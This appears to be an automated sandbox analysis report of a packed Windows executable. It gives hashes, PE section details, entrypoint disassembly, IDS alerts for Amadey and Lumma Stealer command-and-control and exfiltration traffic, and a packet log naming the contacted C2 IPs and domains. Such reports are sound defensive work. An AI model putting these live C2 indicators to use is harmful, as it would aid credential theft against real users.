                                                                                                                                                                  Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Entropy (8bit):6.542697972844218
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                  File name:file.exe
                                                                                                                                                                  File size:2'943'488 bytes
                                                                                                                                                                  MD5:65f41a5703887beeba49a84ca30bae19
                                                                                                                                                                  SHA1:1ae160165e2ba85f3b90d34b451fe965ce51701e
                                                                                                                                                                  SHA256:e99443934269e932c08bf7928da5ff5c5fae2cc72794380d5f7f7a2d0f7bc46e
                                                                                                                                                                  SHA512:62d2c181b59a8d74978f7a9a335472c119e599c3106c979fb3f02663d22becb7c584d84f6dd6c4b4499997d72ec67cf4274643a4ae09485a90ae8f543ce9f6bb
                                                                                                                                                                  SSDEEP:24576:4ec0z/YLlWxLAYD4LdIS7YRsgesjOT/aADjxyRyznuRr3iNQ8TKSurHU8wyRHUvI:jDk0L9sKSGdW/HVl9iHzw7aipAP
                                                                                                                                                                  TLSH:EED53BA6B80572CBD48E16B49527CD6E987D47B917204DC3A83C787AFD63CC216F9C28
                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                  Static PE Info

                                                                                                                                                                  General

                                                                                                                                                                  Entrypoint:0x709000
                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                  File Version Major:6
                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                  Instruction
                                                                                                                                                                  jmp 00007FD90943FD9Ah
                                                                                                                                                                  bswap eax
                                                                                                                                                                  sub al, 00h
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  jmp 00007FD909441D95h
                                                                                                                                                                  add byte ptr [esi], al
                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add bh, bh
                                                                                                                                                                  inc dword ptr [eax]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [ecx], cl
                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  push es
                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], dl
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [ebx], cl
                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], cl
                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  push es
                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add ecx, dword ptr [edx]
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                  Data Directories

                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x307de80x10eokeitfr
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x307d980x18eokeitfr
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                  Sections

                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                  0x10000x680000x2de00d7773c15a2216668b26f9f0f3675c5e9False0.9976956318119891data7.9768208267474385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  eokeitfr0x6b0000x29d0000x29ce00a0bbf866742fcf8602ede13f82262983unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  xdqbfquo0x3080000x10000x40000e7e18dde6f4d3824e500be808d5eb2False0.71875data5.709899581413696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                  .taggant0x3090000x30000x2200b0a036a781c2ee04e8ae9ae4a1867242False0.05974264705882353DOS executable (COM)0.7120770624414909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                  Resources

                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                  RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                  RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                  Imports

                                                                                                                                                                  DLLImport
                                                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                                                  Possible Origin

                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                  2024-12-18T11:09:07.023758+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649862185.215.113.4380TCP
                                                                                                                                                                  2024-12-18T11:09:11.447771+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64987731.41.244.1180TCP
                                                                                                                                                                  2024-12-18T11:09:15.670084+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.649871TCP
                                                                                                                                                                  2024-12-18T11:09:17.000758+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649888185.215.113.4380TCP
                                                                                                                                                                  2024-12-18T11:09:17.031543+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6520141.1.1.153UDP
                                                                                                                                                                  2024-12-18T11:09:17.256337+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6545331.1.1.153UDP
                                                                                                                                                                  2024-12-18T11:09:18.448636+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64989431.41.244.1180TCP
                                                                                                                                                                  2024-12-18T11:09:18.796849+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649895172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:18.796849+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649895172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:23.641530+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649907185.215.113.4380TCP
                                                                                                                                                                  2024-12-18T11:09:24.917554+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649913104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:25.083891+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64991231.41.244.1180TCP
                                                                                                                                                                  2024-12-18T11:09:26.361720+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649895172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:26.361720+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649895172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:27.591453+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649919172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:27.591453+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649919172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:29.578095+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649913104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:29.578095+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649913104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:30.798177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649929104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:37.782805+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649940185.215.113.4380TCP
                                                                                                                                                                  2024-12-18T11:09:41.213302+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649919172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:41.213302+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649919172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:42.876304+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649959172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:42.876304+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649959172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:44.355879+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649929104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:44.355879+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649929104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:45.288765+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64996631.41.244.1180TCP
                                                                                                                                                                  2024-12-18T11:09:46.023928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649971104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:49.115738+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649959172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:50.491708+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649980172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:50.491708+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649980172.67.179.109443TCP
                                                                                                                                                                  2024-12-18T11:09:51.248301+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.649961TCP
                                                                                                                                                                  2024-12-18T11:09:52.583400+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.649985185.215.113.4380TCP
                                                                                                                                                                  2024-12-18T11:09:56.629562+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649971104.21.23.76443TCP
                                                                                                                                                                  2024-12-18T11:09:58.015741+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650000104.21.23.76443TCP

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Dec 18, 2024 11:09:05.555834055 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:05.675631046 CET8049862185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:05.675798893 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:05.676002979 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:05.796130896 CET8049862185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:07.023674011 CET8049862185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:07.023757935 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.532529116 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.532850027 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.652436018 CET8049871185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:08.652554989 CET8049862185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:08.652677059 CET4986280192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.652892113 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.652892113 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:08.772547960 CET8049871185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:09.993032932 CET8049871185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:09.993171930 CET4987180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:09.998320103 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:10.117994070 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:10.118154049 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:10.118413925 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:10.238632917 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447705984 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447771072 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.447808027 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447819948 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447853088 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.447937012 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447946072 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447947025 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.447992086 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.448071957 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.448111057 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.448132038 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.448156118 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.448177099 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.448182106 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.448209047 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.448226929 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.569111109 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.569216967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.569216967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.569264889 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.573353052 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.573395967 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.639753103 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.639866114 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.639883041 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.639959097 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.643889904 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.643934965 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.643994093 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.644033909 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.652319908 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.652404070 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.652436972 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.652494907 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.660680056 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.660754919 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.660758972 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.660815001 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.669017076 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.669039011 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.669099092 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.677442074 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.677521944 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.677525997 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.677622080 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.685805082 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.685874939 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.685910940 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.685952902 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.694148064 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.694192886 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.694226980 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.694262981 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.702564955 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.702611923 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.702622890 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.702665091 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.711072922 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.711155891 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.711235046 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.718677044 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.718759060 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.718835115 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.759424925 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.759480000 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.759557962 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.759599924 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.832493067 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.832571030 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.832577944 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.832614899 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.833965063 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.834016085 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.834041119 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.834081888 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.838294029 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.838340044 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.838354111 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.838398933 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.842994928 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.843040943 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.843084097 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.843127012 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.847636938 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.847683907 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.847752094 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.847791910 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.852343082 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.852386951 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.852431059 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.852471113 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.856997967 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.857045889 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.857089043 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.857129097 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.861602068 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.861646891 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.861701012 CET804987731.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:11.861740112 CET4987780192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:11.866255999 CET804987731.41.244.11192.168.2.6
